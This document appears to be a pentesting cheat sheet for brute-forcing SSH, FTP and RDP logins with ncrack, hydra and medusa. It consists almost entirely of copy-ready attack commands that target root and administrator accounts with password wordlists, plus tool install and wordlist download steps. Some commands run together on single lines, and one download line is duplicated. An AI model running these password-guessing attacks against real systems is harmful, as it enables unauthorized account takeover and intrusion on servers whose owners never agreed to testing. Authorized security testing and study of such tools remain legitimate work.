Bruteforce
Brute Forcing Passwords with ncrack, hydra and medusa
ncrack
Install
wget https://nmap.org/ncrack/dist/ncrack-0.5.tar.gz ./configure make make install
SSH
ncrack -p 22 --user root -P 500-worst-passwords.txt 10.10.10.10 ncrack -v -p 22 -T 5 --user bob --save ncrack.save -P /usr/share/wordlists/rockyou.txt 10.28.0.254
FTP
ncrack -u test -P 500-worst-passwords.txt -T 5 10.10.10.10 -p 21
RDP
ncrack -u administrator -P 500-worst-passwords.txt -p 3389 10.212.50.21
hydra
Install
wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz ./configure make make install
SSH
hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
FTP
hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ftp
medusa
Install
wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz ./configure make make install
SSH
medusa -u root -P 500-worst-passwords.txt -h 10.10.10.10 -M ssh
FTP
medusa -u test -P 500-worst-passwords.txt -h 10.10.10.10 -M ftp
Wordlists
[wget http://downloads.skullsecurity.org/passwords/500-worst-passwords.txt wget http://downloads.skullsecurity.org/passwords/500-worst-passwords.txt]
sudo apt -y install seclists